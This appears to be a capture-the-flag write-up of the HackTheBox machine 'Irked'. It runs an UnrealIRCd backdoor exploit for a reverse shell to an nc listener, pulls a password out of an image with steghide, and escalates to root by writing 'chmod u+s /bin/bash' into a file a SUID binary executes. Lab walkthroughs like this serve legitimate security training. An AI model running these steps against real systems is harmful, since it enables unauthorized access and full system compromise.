Irked

#Linux #Enumeration #IRC

Irked is an easy-rated Linux machine from HackTheBox, created by Creator MrAgent. In the current post, my IP is 10.10.14.27, and the target IP is 10.129.124.47.

This machine is straightforward. It follows the basic steps for enumeration and exploitation, with some research included.

Gathering Information

The first steps are about getting basic information about the target, by using nmap and searching information from the website.

Local Terminal
nmap -p- --open -T5 -v -n 10.129.124.47
There is a website, and a lot of ports related to IRC (Internet Relay Chat), we need to get details.
Local Terminal
nmap -sCV -p 22,80,111,6697,8067,34716,65534 10.129.124.47
Definitely there is an IRC working, those are a communication protocol in real time that we can exploit.
Local Terminal
whatweb -v http://10.129.124.47
Nothing relevant
Source code of the target website

We have limited information, but that phrase is enough, at this point our best option is to search about Unrealircd Exploit, you will find this at GitHub.

Weaponization and Exploitation

Local Terminal
git clone https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor 
cd UnrealIRCd-3.2.8.1-Backdoor/
batcat exploit.py

There is some stuff to change, add the information of your own machine there (Here: 10.10.14.27 // 443), if you continue the analysis, you will find a lot of payloads from an argument, we will use bash.

List of payloads
How to use exploit.py

Here we need to open a new terminal listening using the port 443.

Local Terminal [B]
nc -nlvp 443
Local Terminal [A]
python3 exploit.py 10.129.124.47 6697 -payload bash

We are using the target port 6697 because the IRC is there. After executing, a message “Exploit sent successfully” will appear, and your second local terminal [B] will be connected to the target, this will be called [IRCD]. Now we will start with some TTY treatment.

Target Terminal [IRCD]
cd /
find \-name user.txt 2>/dev/null

After exploring a little bit, at /home/djmardov/Documents there is a backup hidden file, let’s see with cat and check what we can find.

Backup hidden file
Content of .backup

Here we have two things: a clue about Steganography, maybe the image at the URL, and a password, probably related to the Steganography step. Now download the image from http://10.129.124.47, the angry face, and open a local terminal.

Local Terminal
exitftool irked.jpg
Nothing weird
Local Terminal
strings irked.jpg
steghide extract -sf irked.jpg              # Without password, it fails.
steghide extract -sf irked.jpg              # pass: UPupDOWNdownLRlrBAbaSSss
cat pass.txt
New password!

By using Steghide, we extract a new password “Kab6h+m+bbp2J:HG”, we can try to use it at IRCD to change our user.

Target Terminal [IRCD]
su djmardov                            #Pass: Kab6h+m+bbp2J:HG

It works, now we are Djmardov and we can read the flag at /home/djmardov/Documents/user.txt

Privileges Scalation

Target Terminal [Djmardov]
cd /
find \-perm -4000 2>/dev/null
It looks like a custom command
Target Terminal [Djmardov]
/usr/bin/viewuser
A beta for a command to work with permissions?
Target Terminal [Djmardov]
strings /usr/bin/viewuser
By using Strings, we can see that needs the file /tmp/listusers
But it doesn’t even exists

We don’t lose if we try to create that file and put a command inside it.

Target Terminal [Djmardov]
touch /tmp/listusers
chmod +x /tmp/listusers
nano /tmp/listusers
Content of /tmp/listusers
#!/bin/bash

chmod u+s /bin/bash
Target Terminal [Djmardov]
ls -l /bin/bash
Looks like now we can use it, it works!
Target Terminal [Djmardov]
bash -p
Target Terminal [root]
cat /root/root.txt
PreviousHelpNextLame

Last updated